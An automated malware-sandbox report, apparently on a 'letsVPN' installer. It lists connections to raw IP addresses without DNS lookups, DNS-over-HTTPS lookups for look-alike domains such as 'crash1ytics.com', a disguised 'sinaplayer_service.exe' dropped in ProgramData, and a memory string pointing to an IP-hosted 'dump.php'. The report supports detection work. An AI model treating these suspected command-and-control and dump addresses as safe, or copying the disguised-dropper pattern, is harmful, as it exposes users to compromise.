              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
              Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
              Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
              Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
              Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
              Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
              Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
              Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
              Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
              Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
              Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
              Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
              Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.56.120
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.56.120
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.56.120
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.56.120
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.56.120
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.56.120
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00373040 GetCurrentThreadId,OutputDebugStringA,?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetCurrentThreadId,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,OutputDebugStringA,??3@YAXPAX@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ,InternetOpenW,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,GetCurrentThreadId,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,??3@YAXPAX@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,GetCurrentThreadId,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,??3@YAXPAX@Z,HttpOpenRequestW,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_stre17_2_00373040
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EHoDnRGHRnGJKgiBCKlZTSJBaSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: YTViMmFmNmQtNjcxNi00Ng==Origin: ws://ws-ap1.pusher.com
              Source: letsvpn-latest.exe, 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: os/exec.Command(]. new data: GID[^/app([0-9]+)/app^created by (.+)$bad TinySizeClassbad key algorithmbad local addressboundBindToDeviceclose dns channelconnectingAddresscorkOptionEnableddecryption failedduplicate addresseffectiveNetProtoentersyscallblockexec apiAgent GIDexec apiAgent RIDexec deleteRegDirexec format errorexec nicIndexToIPexec phyNIC Indexexec phyNIC SetIPexec tapIFCE Nameexec: killing Cmdexec: not startedfractional secondframe_ping_lengthg already scannedget up-going ACK glEdgeFlagPointerglPopClientAttribglTexCoordPointergp.waiting != nilhandshake failureif-modified-sinceillegal parameterin string literalindex > windowEndinteger too largeinvalid BMPStringinvalid IA5Stringinvalid bit size invalid stream IDip2if func returnipv6-only networkisConnectNotifiedjoyReleaseCapturekey align too biglocked m0 woke upmark - bad statusmarkBits overflowmciGetCreatorTaskmessage too largemidiInGetDevCapsWmidiOutGetNumDevsmidiStreamRestartmissing closing )missing closing ]missing extensionmixerGetLineInfoWmultipartmaxpartsneed re-resolve: nextId too large:nil resource bodyno available Datano data availablenoChecksumEnablednotetsleepg on g0old node version:operation abortedparameter problempermission deniedpkg/buffer.Bufferpkg/sleep.Sleeperpkg/tcpip.Addresspppoe instanceId:protect fd failedreceiveBufferSizereceiveTOSEnabledreceiveTTLEnabledreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of remoteAddr is nilruntime.newosprocruntime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0seeker can't seekselect (no cases)set sdk loglevel:set tap static ipstack: frame={sp:start map checkerstart refresh infswept cached spansync.RWMutex.Lockthread exhaustiontimeGetSystemTimetransfer-encodingtruncated headersudp routines num:unknown caller pcunknown hostname:unknown type kindunrecognized nameupdate dns dialeruse gid:%s rid:%swait for GC cyclewaveInGetDevCapsWwaveInGetPositionwaveOutGetNumDevswebsocket: close wglGetPixelFormatwglGetProcAddresswglSetPixelFormatwine_get_versionwrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
              Source: letsvpn-latest.exe, 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: ws-ap1.pusher.com
              Source: global trafficDNS traffic detected: DNS query: in.appcenter.ms
              Source: global trafficDNS traffic detected: DNS query: www.baidu.com
              Source: global trafficDNS traffic detected: DNS query: www.yandex.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: nal.fqoqehwib.com
              Source: global trafficDNS traffic detected: DNS query: d1dmgcawtbm6l9.cloudfront.net
              Source: global trafficDNS traffic detected: DNS query: chr.alipayassets.com
              Source: global trafficDNS traffic detected: DNS query: nit.crash1ytics.com
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://125.211.213.34/dump.php
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0.
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0#
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: powershell.exe, 00000018.00000002.2663528212.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: svchost.exe, 0000000C.00000002.3903723313.000001CF4D400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-2011a.crl03
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-2011a.crl0
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/AppMenuDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/AppMenuDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ButtonDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ButtonDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/WindowDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/WindowDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/app.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/app.xamld
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/imi/ns/identity-200903
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/sct
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/CK/PSHA1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Cancel
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issuelhttp://docs.oasis-open.org/ws-sx/ws-trust/200
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/CancelT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/IssueT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Renew
